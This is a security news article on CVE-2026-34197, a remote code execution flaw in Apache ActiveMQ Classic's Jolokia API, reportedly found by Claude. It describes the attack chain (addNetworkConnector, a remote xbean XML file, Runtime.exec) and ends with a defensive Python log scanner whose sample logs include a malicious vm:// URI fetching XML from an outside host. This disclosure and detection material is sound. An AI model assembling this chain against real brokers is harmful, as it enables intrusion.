A critical remote code execution (RCE) vulnerability has been disclosed in Apache ActiveMQ Classic, a flaw that sat undetected for over a decade and was ultimately discovered not by a human researcher manually combing through code, but by Anthropic’s Claude AI model in under 10 minutes.
Tracked as CVE-2026-34197, the flaw is an improper input validation and code injection vulnerability residing in Apache ActiveMQ Classic’s Jolokia JMX-HTTP bridge, exposed via the web console at /api/jolokia/ on port 8161.
The vulnerability allows an authenticated attacker to call the addNetworkConnector(String) management operation on the broker’s MBean and supply a crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter.
When processed, ActiveMQ’s VM transport layer creates an on-the-fly embedded broker by calling BrokerFactory.createBroker() using the attacker-supplied URL.
The xbean: scheme then hands the URL to Spring’s ResourceXmlApplicationContext, which instantiates all bean definitions in the remote XML file — allowing arbitrary OS command execution via Spring’s MethodInvokingFactoryBean to invoke Runtime.getRuntime().exec().
The root cause traces back to a remediation for CVE-2022-41678, where Apache added a blanket Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to preserve web console functionality. That decision inadvertently unlocked every management operation — including addNetworkConnector — as an attack surface through Jolokia’s REST API.
While CVE-2026-34197 requires valid credentials in most deployments, default credentials (admin:admin) are widely present across enterprise environments.
[Figure: Apache ActiveMQ RCE Vulnerability (Source: Horizon3)]
More critically, organizations running ActiveMQ versions 6.0.0 through 6.1.1 are exposed to a fully unauthenticated RCE path. A separate flaw, CVE-2024-32114, inadvertently stripped authentication constraints from the /api/* path in those versions, meaning the Jolokia endpoint requires zero credentials — making CVE-2026-34197 a no-auth RCE on those builds.
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog.
Researchers at Horizon3.ai credited Anthropic’s Claude AI with identifying the flaw during an AI-assisted source code review. By providing Claude with a lightweight vulnerability-hunting prompt and a live target for validation, the team enabled the AI to trace the multi-component attack chain spanning Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes.
Analysts noted this chain would likely have taken a skilled human researcher an entire week to map manually, underscoring how AI models are fundamentally lowering the barrier for vulnerability research.
Mitigations
Organizations should monitor ActiveMQ broker logs for entries referencing vm:// URIs containing brokerConfig=xbean:http, POST requests to /api/jolokia/ with addNetworkConnector in the body, and unexpected outbound HTTP connections from the ActiveMQ process. Defenders should also watch for unusual child processes spawned by the ActiveMQ JVM.
The vulnerability is patched in ActiveMQ Classic versions 5.19.4 and 6.2.3. The fix removes the ability for addNetworkConnector to register vm:// transports via the Jolokia API entirely.
All organizations running affected versions should update immediately and audit deployments for default credential usage across all ActiveMQ instances.
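As an added defensive example, not code from the article or from Horizon3, the Python below applies the log indicators and version ranges from the mitigations section to a few constructed sample records. The regular expressions, the log field layout and the assumption that every 5.x/6.x release before the fix versions is affected are mine.

```python
import re
from typing import Iterable

# Indicator strings are the ones named in the advisory; the regexes around
# them are an assumption about how they appear in web and broker logs.
JOLOKIA_POST = re.compile(r"\bPOST\s+/api/jolokia\b")
ADD_NET_CONN = re.compile(r"addNetworkConnector", re.IGNORECASE)
REMOTE_XBEAN = re.compile(r"vm://\S*brokerConfig=xbean:https?://", re.IGNORECASE)

def classify_line(line: str) -> list[str]:
    """Return the indicator names matched by one log line ([] if none)."""
    hits = []
    if JOLOKIA_POST.search(line) and ADD_NET_CONN.search(line):
        hits.append("jolokia-addNetworkConnector")  # proxy/WAF log with request body
    if REMOTE_XBEAN.search(line):
        hits.append("vm-transport-remote-xbean")    # broker log: embedded broker from a URL
    return hits

def scan(lines: Iterable[str]) -> list[tuple[int, list[str]]]:
    """Return (line_number, indicators) for every line that matches something."""
    return [(n, h) for n, ln in enumerate(lines, 1) if (h := classify_line(ln))]

def version_risk(version: str) -> str:
    """Triage an ActiveMQ Classic version against the advisory's ranges.
    Assumption: every 5.x/6.x release before 5.19.4 / 6.2.3 is affected."""
    v = tuple(int(x) for x in version.split(".")[:3])
    if v[0] == 6:
        if (6, 0, 0) <= v <= (6, 1, 1):
            return "unauthenticated"  # CVE-2024-32114 removed auth on /api/*
        return "patched" if v >= (6, 2, 3) else "authenticated"
    if v[0] == 5:
        return "patched" if v >= (5, 19, 4) else "authenticated"
    return "unknown"

# Constructed sample records (not real captures): two benign, two suspicious.
SAMPLE_LOGS = [
    '10.0.0.5 - admin "POST /api/jolokia/ HTTP/1.1" 200 body={"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost"}',
    '10.0.0.5 - admin "POST /api/jolokia/ HTTP/1.1" 200 body={"type":"exec","operation":"addNetworkConnector(java.lang.String)"}',
    'INFO | Connector vm://localhost started',
    'INFO | Establishing network connection from vm://localhost?brokerConfig=xbean:http://203.0.113.10/broker.xml',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOGS):
        print(f"line {n}: {', '.join(hits)}")
    for ver in ("5.18.3", "6.1.0", "6.2.3"):
        print(ver, version_risk(ver))
```

Pair the log matches with the process-level signals the article names (outbound HTTP from the broker JVM, unexpected child processes), since a single matching line is a lead rather than a confirmation.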
The post Claude Uncovers 13-Year-Old RCE Flaw in Apache ActiveMQ in Just 10 Minutes appeared first on Cyber Security News.